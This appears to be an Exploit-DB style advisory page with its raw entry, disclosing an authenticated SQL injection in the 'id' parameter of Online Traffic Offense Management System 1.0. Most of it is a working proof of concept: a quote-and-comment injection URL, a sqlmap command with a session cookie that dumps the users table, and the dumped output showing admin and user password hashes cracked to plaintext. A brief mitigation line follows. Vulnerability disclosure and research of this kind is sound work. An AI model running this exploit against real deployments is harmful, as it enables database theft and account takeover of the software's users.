Online Traffic Offense Management System 1.0 - 'id' SQL Injection (Authenticated)

vendor:

Online Traffic Offense Management System

by:

Justin White

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: Online Traffic Offense Management System

Affected Version From: 1.0

Affected Version To: 1.0

Patch Exists: NO

Related CWE: N/A

CPE: a:sourcecodester:online_traffic_offense_management_system:1.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Linux (Ubuntu 20.04)

2021

Online Traffic Offense Management System 1.0 – ‘id’ SQL Injection (Authenticated)

The id paramater is vulnerable to SQL injection. Going to http://localhost/traffic_offense/admin/?page=drivers/manage_driver&id=4'-- will throw errors on the web page. Using sqlmap with dump database, sqlmap -u "http://localhost/traffic_offense/admin/?page=drivers/manage_driver&id=4" --cookie="PHPSESSIONID=83ccd78474298cd9c3ad3def1f79f2ac" -D traffic_offense_db -T users --dump, will reveal the username and password of the users.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in a SQL query.

Source

Exploit-DB raw data:

# Exploit Title: Online Traffic Offense Management System 1.0 - 'id' SQL Injection (Authenticated)
# Date: 19/08/2021
# Exploit Author: Justin White
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/14909/online-traffic-offense-management-system-php-free-source-code.html
# Version: 1.0
# Testeted on: Linux (Ubuntu 20.04) using LAMPP

## SQL Injection

# Vulnerable page
http://localhost/traffic_offense/admin/?page=drivers/manage_driver&id=

#Vulnerable paramater 
The id paramater is Vulnerable to sqli

#POC
going to http://localhost/traffic_offense/admin/?page=drivers/manage_driver&id=4'-- will throw errors on the web page.

Notice: Trying to get property 'num_rows' of non-object in /opt/lampp/htdocs/traffic_offense/admin/drivers/manage_driver.php on line 5
Notice: Trying to get property 'num_rows' of non-object in /opt/lampp/htdocs/traffic_offense/admin/drivers/manage_driver.php on line 10

Using sqlmap with dump database 
sqlmap -u "http://localhost/traffic_offense/admin/?page=drivers/manage_driver&id=4" --cookie="PHPSESSIONID=83ccd78474298cd9c3ad3def1f79f2ac" -D traffic_offense_db -T users --dump

+----+------+-------------------------------+----------+---------------------------------------------+----------+--------------+---------------------+------------+---------------------+
| id | type | avatar                        | lastname | password                                    | username | firstname    | date_added          | last_login | date_updated        |
+----+------+-------------------------------+----------+---------------------------------------------+----------+--------------+---------------------+------------+---------------------+
| 1  | 1    | uploads/1624240500_avatar.png | Admin    | 0192023a7bbd73250516f069df18b500 (admin123) | admin    | Adminstrator | 2021-01-20 14:02:37 | NULL       | 2021-06-21 09:55:07 |
| 9  | 2    | uploads/1629336240_avatar.jpg | Smith    | 202cb962ac59075b964b07152d234b70 (123)      | jsmith1  | John         | 2021-08-19 09:24:25 | NULL       | 2021-08-19 19:14:58 |
+----+------+-------------------------------+----------+---------------------------------------------+----------+--------------+---------------------+------------+---------------------+